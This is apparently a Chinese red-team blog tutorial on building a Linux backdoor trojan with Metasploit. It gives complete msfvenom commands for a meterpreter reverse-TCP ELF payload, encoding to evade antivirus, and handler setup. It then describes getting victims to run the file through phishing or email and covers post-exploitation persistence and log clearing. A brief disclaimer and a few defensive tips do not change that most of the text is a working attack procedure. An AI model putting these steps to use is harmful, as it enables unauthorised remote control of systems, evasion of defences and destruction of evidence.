红队/白帽必经之路(19)——如何用Metasploit制作Linux恶意木马病毒/软件获取shell 既然是红队，那就对自己狠一点 —— 从零开始打造Linux后门：Metasploit恶意软件生成实战

红队/白帽必经之路(19)——如何用Metasploit制作Linux恶意木马病毒/软件获取shell 既然是红队，那就对自己狠一点 —— 从零开始打造Linux后门：Metasploit恶意软件生成实战

欢迎来到红队/白帽技术分享系列！本文是第19篇，我们将深入探讨如何使用Metasploit框架制作针对Linux系统的恶意木马，实现远程shell获取。请注意：所有技术仅供授权测试和学习，严禁非法使用。掌握这些知识，能帮助你更好地理解攻击者的手法，从而强化自身防御。本文将围绕Metasploit教程、Linux木马制作、后门生成以及红队渗透测试等关键词展开，一步步带你从零到实战。

1. 环境准备

你需要一台攻击机（推荐Kali Linux，内置Metasploit）和一台目标Linux主机（可以是虚拟机，如Ubuntu/CentOS）。确保两者网络互通。在Kali中打开终端，检查Metasploit是否已安装：msfconsole -v。如果未安装，执行sudo apt update && sudo apt install metasploit-framework。

2. 生成Linux木马

使用msfvenom生成payload。这里我们选择经典的linux/x64/meterpreter/reverse_tcp，设置攻击机IP和监听端口。命令如下：

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf  

其中LHOST替换为你的攻击机实际IP。生成的shell.elf就是一个Linux可执行木马。为了让木马更难被察觉，我们可以对其进行编码：msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f elf -o encoded.elf，这里使用了5次编码迭代，增加免杀能力。下图展示了生成过程：

3. 设置监听

在攻击机上启动msfconsole，配置handler模块接收反弹连接：

    msfconsoleuse exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset LHOST 192.168.1.100set LPORT 4444exploit -j  

参数含义：-j表示作为后台作业运行。此时攻击机已就绪，等待目标上线。

4. 诱导目标执行

将生成的木马文件（如encoded.elf）通过各种方式传输到目标Linux主机，比如通过邮件、钓鱼下载、物理接触等。然后需要赋予执行权限并运行：chmod +x encoded.elf && ./encoded.elf。一旦执行，目标机会主动连接攻击机的监听端口。

5. 获取Shell

当目标执行木马后，攻击机的msfconsole会显示新会话。输入sessions -i 1进入会话，你将获得一个Meterpreter shell，可以执行各种命令：sysinfo查看系统信息，shell获取系统命令行，upload/download文件等。此时你已经完全控制了目标机。

6. 进阶与防御

真正的红队渗透测试还会涉及持久化、痕迹清理、免杀对抗等。例如，可以使用persistence脚本在目标机安装后门，或者通过clearev清除日志。对于防御方，建议开启防火墙、使用杀软、定期更新系统、对未知来源的可执行文件保持警惕。本文作为Metasploit教程的一部分，旨在提升你的攻防意识。

总结

通过本文，你学习了如何制作一个简单的Linux木马并获取反弹shell。记住，技术本身无善恶，关键在于使用者的意图。希望你在合法的红队渗透测试或白帽工作中应用这些知识，为网络安全贡献力量。下期我们将探讨Windows平台的后门生成，敬请期待！

—— 本文关键词：Metasploit教程、Linux木马制作、后门生成、红队渗透测试 ——